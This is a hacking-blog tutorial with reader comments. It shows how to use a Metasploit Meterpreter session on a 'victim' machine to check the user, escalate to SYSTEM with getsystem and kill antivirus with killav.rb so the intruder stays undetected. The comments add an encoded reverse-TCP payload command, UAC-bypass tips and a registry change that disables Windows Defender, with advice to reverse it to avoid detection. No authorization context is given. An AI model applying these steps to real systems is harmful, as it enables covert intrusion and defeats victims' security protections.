Welcome back, my tenderfoot hackers!
In some of my past articles, I've shown numerous ways of embedding a listener/rootkit on a remote system, including buffer overflows of the operating system, getting the victim to click on a link to our malicious website, and sending a malicious Microsoft Office and Adobe Acrobat file.
In each case, we've embedded a listener/rootkit that gives us control over the system. Metasploit has a powerful listener called Meterpreter that enables us to control the system, send more commands, pivot from the victim to other systems, elevate our privileges, and many other things, as we will see.
My next few posts will focus on how to use the Meterpreter in various powerful ways. Today, we will focus on how to use the Meterpreter to disable the antivirus protection on our victim system, which is more advanced than simply bypassing the antivirus program, as I wrote about last time.
Disabling is necessary because the next time the system is scanned by the victim's antivirus software, it's likely to detect our listener and disable it, so we need to take preemptive action to disable it before it can disable us.
So...fire up Metasploit and let's get hacking!
Step 1: Getting Started
I'm assuming you have already embedded your Meterpreter listener by one of the many methods I've outlined in my earlier posts, and that you have a Meterpreter prompt as it appears in the screenshot below.
Before we can begin to kill the AV software, we need to escalate our privileges.
Usually, when we embed a listener on the victim's system, the listener will only have the privileges of the user who provided us with a gateway to their system by clicking on the malicious website, Office doc, Abobe PDF, etc.
That user most often has limited rights or privileges to the system. Unlimited rights to do anything on the system is held by the administrator or system administrator (or sysadmin for short).
We need to escalate our privileges from the user to sysadmin to have our way with this computer.
Step 2: Checking the User
Before we start the process of escalation, let's check what user we are logged in as. Type:
meterpreter > getuid
This will return the ID of the user we are logged in as. If we are anything but the sysadmin, we'll need to escalate to kill the antivirus software.
Step 3: Escalate Privileges
Metasploit and its Meterpreter make it simple to escalate privileges to the sysadmin. Simply type getsystem at the Meterpreter prompt.
meterpreter > getsystem
Notice that Metasploit responds with "...got system (with technique 1)". Metasploit has multiple methods to escalate privileges and it tries each of them out until one works.
In our case, it was successful with technique 1.
Step 4: Check That We Are Sysadmin
Now that Metasploit has told us that it has escalated our privileges to sysadmin, let's make sure. Type:
meterpreter > getuid
As you can see in my screenshot above, the victim responds with NT AUTHORITY\SYSTEM, the syadmin user!
Congratulations! You can now have your way this victim.
Step 5: Kill the AntiVirus Software
Now that we have unlimited rights to this system, let's kill the antivirus software. Metasploit has a Ruby script called killav.rb. We simply run that script from the Meterpreter prompt and it will kill the system's antivirus software.
Make certain to start the script with the keyword run. Type:
meterpreter > run killav.rb
Notice from the screenshot above that the killav.rb script not only killed the antivirus process, but also the open command prompt.
Now that we have killed the antivirus process, we can remain hidden within their system and do as we please with little or no chance of being detected.
In upcoming blogs, we will explore more adventures with the power of our embedded listener/rootkit with sysadmin privileges. There is no limit what we can do now!
Just updated your iPhone to iOS 18? You'll find a ton of hot new features for some of your most-used Apple apps. Dive in and see for yourself:
43 Comments
Good information.
Hey, I was just wondering if there was any way to connect to a meterpreter without reinstalling it, for example if you used it one day, then went back onto msfconsole another day could you get access to meterpreter without using one of the exploits with a meterpreter payload? Thanks
There is a command for persistence....Chk it :)
use vitualbox or any vitual machines, then save the machine state
Are you sure??? Will this killav kill the Resident services???
For eg. , in case of AVG, will killav kill avg watch dog and avg IDS???
Think again....Do thorough R&D before posting. Its a request...No offences...
Debojyo:
Welcome to Null Byte!
I've never tried killing AVG, but it certainly worked on a long list of commercial AV software I tested it on. If you tested it on AVG, please post your results and screenshots here. BTW, I wouldn't consider Watchdog or AVG IDS to be AV software.
No exploit is perfect. There will always be exceptions.
OTW
Hi Guys
can i exploit some antivirus without a meterpreter session?
lot of exploitation alert antivirus and meterpreter session is impossible sometimes..
Thanks
There is always a way, if you have the skills and creativity.
OTW
now i'm reading how to use msfpayload and msfencode and i understand this technique..
i've just a question..
if i do this command
msfpayload windows/shell/reversetcp LHOST=192.168.1.101 R |msfencode -e x86/shikataganai -c 20 -t vbs > /root/AVbypass.vbs
and the target open the AVbypass.vbs file i've a reverse tcp connection so i can use meterpreter normally?
i undesrtand the sintax of the command but i have just this dude..
Dark;
First, this example is using the winows/shell/reverse_tcp payload, not the meterpreter.
Second, after re-encoding the payload, you then need to send it with an exploit.
OTW
Ok..Sorry for the meterpreter question.. I've read the command in a wrong way.
For the re-encoding now i understand. Thanks.
Hy!to run this killav script first you must have sysadmin privileges,right?how obtain this privileges and AV let me do this?....thank you and sorry for my english.
Andrei:
Many exploits bring you in as sysadmin. If not, the meterpreter has a getsystem command to escalate privileges to sysadmin.
OTW
Hello , OTW
when I ran the command getsystem I got this warning.
meterpreter > getsystem
Any thoughts
Thanks
Hello Master OTW
I am new here,but i have been reading your post and i will like to Thanks on behalf of all ur follows for u are doing a great job. I have been going around the web trying to get stuff to start doing hacking on my own,but the day i found ur web side,my ideas on hacking has increase thanks to you. My promise to u is that after learning well from you, my first hit even if i dont know u,but i will make shore u have ur share of the cake.
can it kill all AV's ? including kaspersky with autoprotect ?.
(failed , access is denied )
Hello Sir,
Let's take for example Windows Defender, since I have it on my system.
killav, or getcountermeasures didn't kill the defender so I had to try manually.
I got in, disabled the firewalls, elevated myself to authority system, yet when I try to kill WinDefend and WdNisSvc processes it says access denied. Any tips on how to kill the AV? Thank you
Did you try to kill the process?
Yes, as I said, I found 2 processes MsDefender and MsDefender Network Inspection and tried to kill them with respective PIDs. I was denied. The processes both have System authority. Could It be that I have to lower myslelf to Current User to be able to kill those?
Are you sure you have system authority privileges? It sounds like you don't. What OS?
Can you send some screenshots?
Before this, since getsystem couldn't elevate me I used bypassuac_injection successfully after which i got system.
http://prntscr.com/89kn43
Strange, last time those 2 processes had system authorities, unlike now:
http://prntscr.com/89knxx
And for some reason process name for PID 3672 differs in meterpreter:
http://prntscr.com/89kov0
What OS is this?
Have you tried taskkill?
It's Windows 8.1
taskkill? no command,script nor extension.
taskkill is a Windows command . You can either drop to shell and use or use "execute" before it in Meterpreter.
Sorry for wasting your time, I misunderstood. I ran taskkil in shell but no avail - Denied. yet whoami shows system authority.
you aren't system authority, obviously.
Impossible, both Whoami and getuid show NT System Authority. I am able to do any other elevated tasks (migrate to system process,etc) but not kill off Defender. It must be a bug or more probably some kind of defense mechanism. Anyways, Thanks for your time!
Sorry for flooding your post, just a note. As I have researched Windows Defender is almost impossible to stop, no mather your privileges. Even after disabling it from the UI it restarts itself merely seconds later. Tried safe mode- still no avail.
Windows Defender also has a service. Did you kill that as well?
Ya you are right NE-PY it impossible to stop. But not sure of disabling.
It works fine. When i disable Windows defender through UI it gets disabled and remains disabled until i manually enable it.
And i think there we should try to disable the startup service of windows defender which makes it run on every startup. We should try to disable it through regedit. I'll find out and let you know.
I also had the same problem.
I might be too late but you can stop windows defender by creating a DWORD named: "DisableAntiSpyware" and setting its value to '1' in the "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" registry key. And then restarting the victim PC.
Make sure that you set the value back to 0 if windows defender was on to make sure you are not detected.
What options do I have when I get 'getsystem' fails(privelevategetsystem: Operation failed: The environment is incorrect.)? On a W7 64-bit system.
Use an exploit outside meterpreter to esacalate your privileges. It would help to see the full error. It is likely that windows UAC is causing the problem. If so, try bypassuac or bypassuacinjection
I tried running that exploit and got this:
Error uploading file C:\xxxxx\xxxx\xxxxx\Local\Temp\fWPrgsyDsyntv.exe: NoMethodError undefined method `length' for nil:NilClass
I love how you xxx'd out AppData too. Just so no one could track you down XD
Robyn
That is vague... You'll have to put the entire error plus what you have done if you want accurate answer. A screenshot would be great
OTW:
can i add exception in AV instead off killing AV? 'cause killing AV is too fishy.
Yes, but it is much harder.
we are hackers. we love hardness. can you do an article on this subject?
Hey OTW, I have a question.
Do you know of any programs or ways to elevate privileges if you are just a standard user and are physically at the computer?
If you're using linux just use "su" in command line. You'll be root. Granted you need the root password of course.
Thank you for the tutorial. I get "access denied" upon using killav.rb i have no problem using getsystem, it tells me NT AUTHORITY/SYSTEM like it is supposed to. I have tried to kill off mcafee tasks on my windows 7 64bit testing environment, but I get access denied using meterpreter as well as from within the shell. I have been looking into UAC bypassing but I am beginning to think that won't work, since my privileges are already fully elevated. So what do you do then? The goal of my current test is to run persistence but mcafee detects this. Thank you in advance.
Share Your Thoughts